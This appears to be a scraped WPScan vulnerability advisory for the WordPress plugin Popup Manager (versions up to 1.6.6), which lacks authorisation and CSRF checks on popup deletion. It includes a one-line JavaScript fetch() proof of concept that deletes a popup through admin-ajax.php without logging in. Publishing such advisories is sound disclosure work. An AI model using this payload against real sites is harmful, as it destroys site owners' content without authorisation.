Lucene search

K
wpvulndbLana CodesWPVDB-ID:60786BF8-C0D7-4D80-B189-866ABA79BCE2
HistoryNov 28, 2022 - 12:00 a.m.

Popup Manager <= 1.6.6 - Unauthenticated Arbitrary Popup Deletion

2022-11-2800:00:00
Lana Codes
wpscan.com
9
popup manager
unauthenticated
arbitrary deletion
csrf
wordpress plugin

EPSS

0.001

Percentile

39.7%

The plugin does not have authorisation and CSRF checks when deleting popups, which could allow unauthenticated users to delete them

PoC

As an unauthenticated users, or via CSRF: fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=pm_delete_popup&popup;_id=2’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));

EPSS

0.001

Percentile

39.7%

Related for WPVDB-ID:60786BF8-C0D7-4D80-B189-866ABA79BCE2